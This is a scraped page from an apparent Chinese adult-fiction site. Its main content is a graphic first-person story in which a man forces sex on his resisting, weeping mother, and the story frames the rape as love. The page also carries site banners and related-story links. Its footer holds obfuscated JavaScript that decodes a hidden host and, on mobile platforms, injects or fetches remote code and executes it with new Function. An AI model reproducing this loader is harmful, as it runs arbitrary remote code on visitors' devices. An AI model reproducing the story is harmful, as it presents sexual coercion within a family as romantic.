返回

我深爱着妈妈620

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

我叫吕得昌,从小到大都是一个乖乖小孩,听父母的话,听老师的话。从小父亲就常常告诉我,将来长大了,娶妻不论长相,不论年龄,只论有没有钱,娶妻就要娶一个有钱人家的女儿当老婆,这样可少奋斗几十年。只要老婆有钱你就可以不用工作,过上锦衣玉食的生活,可以雇很多佣人,什么都不用自己做,当一个高高在上的大老爷。

父亲常常在我耳边唠叨,他的话一直伴随着我成长。我读书的日子里,无论是小学,还是中学,我身边围绕着许多形形色色的女同学,她们或多或少对我有点意思,但我都选择了回避,因为那些都是穷人家的孩子。不要问我为什么我身边有那么多女孩,那是因为我的长相还不错,说是一表人才也不为过,亲朋好友也都常常夸我。我父亲还曾经戏言道:如果将来得昌没有什么出息的话,我会让他去当牛郎,那才不会埋没他的长处。

别人听了都会认为那是父亲在开玩笑,但我不这么认为,应为父亲的为人我太了解了,父亲是一个两面三刀,一个非常现实的人,谁有奶谁就是娘。就拿我大伯来说吧,大伯早年下海赚了些钱,也算一个百万富翁。而我们一个三口之家,全靠我母亲一个人在工厂里打工赚钱养家,而我父亲则是一个无业游民,整天游手好闲,那里有好玩的事就会有他的身影,就这样我们一家的日子过得比较艰难。

大伯发财之后对我父亲很是照顾,家里缺什么他买什么。大伯家本来就离我们只有几条街而已,但是以前父亲也很少会踏足大伯家,但自从大伯发财了之后,父亲天天都到大伯家报到。大哥长大哥短的,对大伯一家人也都极为友好,浑然忘记了大伯以前穷的时候,自己因为一点口交就追打了大伯几条街的事。后来大伯生意失败了,父亲没少嘲笑他,说他注定穷一辈子的,发不了财的。

母亲是一个非常温柔贤淑的女人,脸上总是挂着淡淡的微笑,每个看到这笑容的人都会受其感染,会有一种从内心感到高兴舒服的感觉。

我有时会觉得奇怪,像母亲这样一个好女人为什么会嫁给父亲这么一个一无是处的流氓。在我印象里,母亲从来没有发过脾气,街坊邻居的关系也都相处得很和睦,从来没有发生口交过。每天日出起来做饭给我们吃,然后就去工厂,回来就继续做家务,从来没有为家务如此繁重而埋怨过。对于母亲我心里有一种说不出的情感,每当看着母亲我的内心都会感到非常的舒服和安宁,所以从小我就喜欢黏着母亲,趴在母亲的怀里,听着母亲说故事,闻着母亲身上淡淡的体香。这是我孩童时最大的享受,也是最美好的回忆,我有时在想,我不想长大,长大了就不能再像现在这样依偎在母亲怀里了。

父亲最大的心愿就是望子成龙,为了让我将来能够赚大钱,能够娶到一个有钱人的女儿当老婆这个目的,他非常苛刻的要求我,让课余时间里都不得浪费一秒钟的时间去玩耍,得不停的埋头啃书本。就这样我的读书生涯是那么的漫长,那么的枯燥,我几乎没有一个朋友,又有谁会跟一个书呆子交朋友呢?

在熬过漫长的中学生涯后,我如愿的考上了当地的一所名牌大学。母亲很高兴,在我接到入学通知书的那天,母亲就立即把家里的养的鸡都杀了请客,为我庆祝,那时父亲还埋怨母亲不该都杀了,他还要留着鸡给自己下酒呢。

这时侯父亲一脸严肃的把我叫到一边,语重心长的交给了我一个任务,找一个有钱女人当老婆,长相不重要。

在这个就业竞争如此激烈的社会里,一个有钱的老婆的确可以大大的帮助自己,让自己在事业上有所成就,我也觉得父亲的话有些道理。

我也按照这个目标前进着,但现实总是那么的残酷,有钱的女人大都丑的要命,长相不错的又没钱,有钱有貌的又轮不到我,难道真的要牺牲自己,找一个丑女人吗?我迷惑了。

就这样,大学四年里快结束了,我都没有找到什么有钱人的女儿当老婆,父亲急了,当即下了死命令,要我在毕业之前找到,否则不认我。其实我对父亲已经没有什么敬意了,认不认都无所谓了,但母亲我是绝对不能不认的,母亲是我生命里唯一重视的人了,我这么辛苦的学习都是让母亲过上好日子。

这时一个叫程丽丽的女人闯进了我的生活圈里,她长相一般,五官勉强过得去,跟丑字只有一线之差,体型微胖,身高不到一米六,是一个典型的胖妹。她很快就对我展开了攻势,我本不大愿理睬她,只是勉强的应付她,实在对她兴趣缺缺,但她很有头脑,把车开到了我家里。当父亲看到那价值几十万的轿车时,眼睛一亮,当知道是我朋友时,那热情洋溢充满真诚的表情让我都差点不认识。

他很快就对丽丽问长问短,打听她的背景,但父亲知道她的父亲家产多达上亿时,父亲眼里充满了无法掩饰的羡慕和妒忌。父亲拚命地鼓吹我去追她,而程丽丽也常常对我关怀又加,不断的在我面前表露爱意,在父亲和丽丽的双重攻势下我很快就沦陷了。我在大学毕业之后就跟她结婚了,我们搬进了她父亲给的别墅,

之后我就在她父亲的公司里上班,但也只是当一个小职员而已,她父亲也就是我岳父,根本就没有对我进行任何的特殊照顾,看向我的眼神还充满了不屑,包括她母亲和她唯一的弟弟,她一家人都是这样的。

婚后,她的性情大变,以前对我千依百顺的情况一去不复返,常常对我指手画脚的,呼之则来,挥之则去,还把家里的佣人都解雇了,说是为了过二人世界,只留一个厨师来满足她的大胃口。她常常把我当佣人来使唤,什么都要我干,我每天劳累了一天,回到家里还有为她洗衣,打扫卫生。这一切都还是可以忍受的,但最令人无法忍受的是她的超强性欲,她每天晚上都要好几次才满足,还经常变相的折磨人。每天都被她那一身肥肉压着,看着她那满身的脂肪,看着她胸前那令人作呕的大肉球,还有她那令人恶心的体味,这那里是做爱?分明是做苦力,就是做苦力都不会这么难熬辛苦。日子就这样熬过了半年,我对她渐渐产生了性恐惧,我害怕见到她的肥肉,

才半年我就廋了整整五公斤,而她竟然胖了十公斤,整个人就像一团大白肉堆起来似的,我都怀疑她是不是会采阳补阴了。我渐渐地拒绝她的性爱,而她见我无法再满足她,她竟然在外面养了个小白脸,甚至公然带回了别墅。我当然无法忍受如此大的绿帽,当即说道:你什么意思?养一个小白脸还把他带回家?

可是她却一脸不在乎的道:这算什么,旧的不能用了,当然找个新的咯。我听她话里好像把我当成了一个旧的小白脸立即怒喝道:你说这话是什么意思?

她眼神充满了不屑的望着我,一脸尖酸刻薄的道:哈哈,你会听不出吗,你以为我不知道你是为了什么跟我结婚的,你就是钱,你这个小白脸。

你满足不了我了,我就另外找一个,有什么不对吗她接着道:你大概不知道我还找了一个老白脸吧,那是你父亲,哈哈,你父亲可比你能干多了,哈哈我听了她的话都呆住了,我完全不能相信我父亲会做这等事,但一想到他的为人我又迷惘了,我的内心告诉我,父亲为了钱可能真的做了。你父亲卖了儿子,还卖了自己,哈哈,父子都出来卖,这可真少有啊。程丽丽尖酸刻薄的话一直在空旷的房子里回荡着。

我什么也没说,走了出别墅,我现在只想见到母亲,我坐在的士里,回忆了自己这二十四年的经历,好像一个扯线公仔似的,完全没有一丝的自由,就连婚姻也没有自由。到了家里,我见到了数月未见的母亲,母亲依旧是微笑的看着我,脸上充满着慈爱。母亲依旧没有变,美丽的酮体还是那么的凹凸有致,岁月仿佛没有在她身上留下痕迹。

到了此时我在也忍不住,扑到了母亲怀里大哭起来。

母亲有点不知所措,但见我一个二十几岁的大男人哭成这样,也知道我一定受了不小的委屈。昌儿,到底发生了什么是,你别哭,跟我说说母亲安慰道。趴在母亲怀里,呼吸着熟悉的体香,我感觉自己好像回到了少年时代,受到委屈就到母亲怀里撒娇。在母亲的安慰下,我的情绪的渐渐的稳定下来,我把结婚之后的事都跟母亲说了,在把今天的事也一丝没有隐瞒的告诉她。

母亲听了我受了那么多委屈,很伤心,但她听到父亲的所作所为就完全无法接受,难怪最近他出手那么阔气,原来是这样,好一个吕赵鑫,好一个老白脸。我们母子二人如何面对眼前的事实,最后母子二人抱在一起大哭。

抱着母亲丰满的酮体,看着母亲流着眼泪的俏脸,无助的表情,我非常心疼,要是母亲是我的老婆,我一定好好爱她,不让她受到半点委屈。抱着母亲,我的下体渐渐有了反应,抚摸母亲背部的手渐渐的向下移去,体内的欲望渐渐的燃烧起来,对象是我最爱的母亲,我明知这样是不对的,但我不想在压制对母亲的爱意,我爱母亲,我爱母亲的一切。

我一手紧紧的抱住母亲,一手抚摸着母亲充满肉感的臀部,当母亲发现我的动作渐渐不对,在发现我的肉棒顶在她的小腹上时。母亲吓了一跳,抬起脸来看到我此时充满了期待和欲火的眼神时,母亲也不笨,立刻知道我要干什么,立刻喝道:昌儿,你想干什么?快放开我。

我知道如果这一次我放手,可能在也没有机会了,而且母子之间一定会有隔膜的,母亲可能会时时防备我的,能否突破母子关系在于今日了。

母亲,我爱你!你就接受我吧!我把心里一直不敢说的此时都说出来了。

昌儿,不要再这样了,你这样是不对的,我们不能这样做,这是乱伦,你快放手。母亲还是不肯接受我,在我怀里剧烈的反抗着。

可是,母亲,我是真的爱你,我从很小的时候就爱上你了,母亲,我要你成为我的女人!我激动地说道。

昌儿,你疯了,你这是在乱伦你知不知道?你快放开我,我还可当没发生过。

不!母亲,爱情是无罪的,我知道我有多爱你吗,我这些年来梦遗的对象都是你啊,母亲,你也爱我的是不是,我们在一起又没有对不起谁,也没有对不起父亲,他自己都不清不白呢。我越说越激动,大嘴不停的像雨点似的吻在母亲脸颊上。

不要这样,昌儿!母亲双手拚命把我的头推开不让我亲吻。

母亲,我爱你,你就做我的女人吧!我发誓我会永远爱你的。

搂住了母亲的动人的酮体,我无法再忍受了,此时我心里只有一个想法:我爱母亲,母亲是我的,我要母亲。

我用双脚夹着母亲,双手快速的把母亲的衬衫拉到肩膀,之后再把母亲的胸罩给扯开,此时我看到了我梦寐以求的景象,母亲赤裸着上半身,雪白肌肤是那么的耀眼,光滑平坦的小腹是那么的迷人,丰满结实的乳房直直的耸立在空气中,因母亲呼吸急促而上下浮动着。母亲的头此时正枕在我的肩膀上,两天无神,默默地流着眼泪。看到母亲这样子,我有些不忍,我的内心竟产生有一丝悔意。但此时已经是骑虎难下了,我为了今天等了这么多年,不能前功尽弃。

我见妈妈好像任命似的静静地躺着,我怕母亲会想不开就在他耳边道:母亲,你真的不愿意吗,我长这么大都还没有碰过真正的女人呢,你就帮帮儿子我吧?母亲静静地看来我一眼道:那你就向自己的母亲出手吗,那跟禽兽有什么分别?不,这不同,母亲,我爱你,我把你当我母亲,当我老婆,我深深地爱着你。我看着母亲的眼睛缓缓的说着。

此时,我们母子都没有说话,都默默地注视着对方,良久,母亲摸着我的脸庞道:昌儿,你是我的儿子,又有哪个母亲不疼自己的孩子呢,如果你真要我给你,但过了今天你必须把所有的事都忘了。

母亲能接受我已经是万幸了,以后的事以后再慢慢来了,我答应道:好的母亲。母亲见我答应了,也就慢慢的站了起来,默默地走到了以前属于我的房间,我跟在母亲后面慢慢走着。母亲站在床边,慢慢的把衣服脱了,随着母亲的动作,母亲身上的衣服渐渐的减少,丰满雪白的酮体渐渐的显现了出来。雪白如雪的肌肤,那又肥又大的乳房微微有些下垂,但也依旧那么诱人,笔直修长的美腿直立着,母亲都已经是四十好几的人了,但当看其凹凸有致的肉体实在无法令人相信这是一个中年妇女所拥有的。母亲脱光衣服后就平躺在床上,脸色微红偏过头闭目静静地等待着我,母亲非常紧张,身体看上去好像有些僵硬,呼吸有点急促,丰满的乳房跟着呼吸正一上一下在不停的抖动着。

我看到目瞪口呆,口干舌燥,不由自主的吞了口口水,身体不争气的颤抖着,我慢慢的伸出微微抖动的双手,轻轻地抚摸着母亲光滑的肌肤,双手慢慢的在母亲平坦的小腹上游走着。慢慢的游向母亲的乳房,轻轻地握着母亲丰满而又柔软的乳房,入手触感极为细腻柔软,就好像棉花糖似的。抚摸着母亲美丽的酮体,我到现在才知道女人的身体摸起来是这么的令人舒服,令人冲动。我时而轻轻的爱抚着,时而大力又得揉捏着,母亲的两只弹性十足乳房在我的手中变幻着不同的形状。

母亲……你的奶子真美……又软又滑……还很大很白,摸起来好舒服啊。

我感叹道,慢慢的俯下脸去,轻轻地吻着母亲丰满的乳房,嘴唇不住摩擦着光滑的肌肤,伸出舌头细细的品味着乳房上每一寸肌肤,在母亲雪白的粉劲跟乳房之间来回舔着,从丰满乳房一直添到到母亲雪白的双肩,最后在那又白又大的丰乳上,细细的品味着。

随着我的刺激母亲的身体也渐渐有了反应,轻轻地抖动着,发出的低低的娇喘声,两只丰乳随着母亲的呼吸微微起伏着。母亲双手紧紧的抓着床单,即使给我如此挑逗她也没有睁开眼睛,始终偏着头不看我。

我的手慢慢的从母亲的乳房往下抚摸移动着,划过光滑的小腹,向最终之地迈进着。

多年心愿终于可在今天达到,妈妈你将永愿属于我的我抚摸着母亲,在也压制不了心中的兴奋,原来幸福是离我如此之近啊。

我轻轻地爱抚着母亲美丽的肉穴:粉红的阴唇,娇嫩的小阴蒂,都在向我展现成熟女性的魅力。

我爱抚着母亲那两片小小的阴唇,慢慢的揉着那细细的阴蒂。母亲的身体渐渐有了反应,双腿不安的颤动着,脸上变得嫣红,美目半闭,此时母亲非常性感诱人之极。 此时我已经无法再忍受了,快速的脱光衣服,趴在母亲身上,肉棒对准母亲的肉穴,噗哧!肉棒进入了母亲温暖狭窄的肉穴里了,柔软的肉壁一下包围了上来,我开始缓缓地抽动着,双手紧捏着母亲柔软的乳房。母亲…

…我好舒服啊……这就是女人真正的滋味……啊……那肥婆的烂穴松得像裤腰带

……我以前都白活了。我兴奋得大声呻吟着。母亲被我插入的那一霎那间,全身都僵硬了,肉穴因紧张而夹得比平时还紧凑,眼泪慢慢的从那充满无奈,悲哀的眼中流出来,小嘴低声喃喃道:我是不是在作孽?如果是,那请上天不要惩罚我儿子,惩罚我吧,孩子是无罪的。

啪!啪!啪!的肉体撞击声不时在狭窄的房间里回荡着,夹杂我的呼喊声跟母亲低低的呻吟声。母亲脸色涨得通红,脸上布满细细的汗珠,长长的头发散落在颤颤的雪白丰乳上。

在乱交禁忌的刺激下,我内心的兴奋跟幸福是无法用言语来表达的,我放弃了心中的一切顾虑,专心的挥动肉棒进攻母亲的肉穴,再扭动腰部快速的进攻着。

母亲肉穴溢出的爱液已经将交合之处的床单都打湿了。嗯……噢……母亲给我抽插得有些受不了,虽然还是咬紧牙关,但也开始从喉咙里发出低低的呻吟声来,嘴角被快感冲击得留下了丝丝的唾液,且喘息越来越重,母亲的呻吟声就是对我无声的鼓励,我更加奋力的进攻着母亲湿漉漉的肉穴。

这时的母亲也有了快感,她下意思的扭摆着美臀,迎合着儿子肉棒的抽插,口中低声的娇哼着。而我见母亲已经情动,开始加快了抽插的速度。

母亲呻吟声,我的喘气声,肉体的撞击声在房间里久久回荡着,形成了幅淫乱的母子乱伦场面。

我双手撑着床上,下身不停的冲击着母亲的肉穴,把头靠近母亲,仔细的观察着母亲。母亲此时脸上充满春情的又有些许淫荡的表情。母亲脸上满是嫣红之色,紧紧闭上美目,不敢看我、但虽然闭上了眼睛,却似乎能清楚的感觉到我火辣辣的视线在看着她。母亲微微睁开美目就看到我的脸紧紧的靠在她脸颊上,她小嘴微张但又紧闭了,不发一言继续闭目,不在理睬我。看着母亲的动作,我想母亲刚才是想教训我的,但此时以她的立场是无论如何也说不出口的。

大约过来一种钟左右,我渐渐的感到母亲高潮即将来临了,因为母亲的身体僵直,嘴里喷着粗气,那是高潮来时的前兆,母亲嫣红的俏脸微微朝后仰起,全身香汗淋漓,沾满汗水的乳房不停地起伏着。

母亲感觉到阴道壁上又痛又刺激的阵阵快感,母亲此时在也无法再漠视身体上的快感了,因为母亲此时已经达到高潮了,母亲非常的克制自己,啊…噢…到了。

我只见母亲发出长长的喘气声后,原本就紧窄的阴道壁更是一阵猛缩,一股股的淫液,不停地冲激着我的大龟头。

我也在母亲的刺激下高潮了,双手用力抱紧母亲丰满的肉体,滚烫的肉棒插入母亲肉穴深处,被阴道壁夹着的肉棒便猛烈的爆发了,一股股滚烫的精液喷射而出,大量热呼呼的精液深深地喷射在母亲温暖的肉穴里。

激情过后,我整个人压在母亲身上喘着粗气,久久不想动弹,母亲此时也正娇喘细细,俏脸布满红潮,弯弯的睫毛不停的颤抖着,迷人的红唇微微张开。

我静静地躺在母亲身上回味着,对母亲说道:母亲,我要跟程丽丽离婚,你支持我吗?母亲有点惊异的看着我道:你决定了吗,你爸不会同意的……

不要在提他,他卖了儿子,再卖了自己,没资格在做我爸我打断母亲的话。

我的反应有点出乎母亲的意料,母亲轻声训斥道:无论发生什么事,你爸就是你爸,不能不认他。接着又说道:你决定了就是去办,不要有顾忌别人了。

我听了母亲的话默默地穿了衣服,走出了我生活了二十几年的老房子,看着晴朗的天空,我觉得它是我内心的写照,我大声朝天空呐喊道:我要靠自己,我不要再娶有钱人的女儿当老婆!

评分
相关推荐
3.0分

3.0分 淫荡妈妈让我深深爱8d2

3.0分

3.0分 淫荡妈妈让我深深爱8d2

3.0分

3.0分 淫荡妈妈让我深深爱8d2

3.0分

3.0分 我和妈妈到深圳拜山4d4

3.0分

3.0分 妈妈我爱你fe0

3.0分

3.0分 妈妈我爱你fe0

3.0分

3.0分 妈妈我爱你fe0

3.0分

3.0分 我的爱!妈妈49b

3.0分

3.0分 妈妈我爱你fe0

3.0分

3.0分 我爱上了妈妈4bc


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};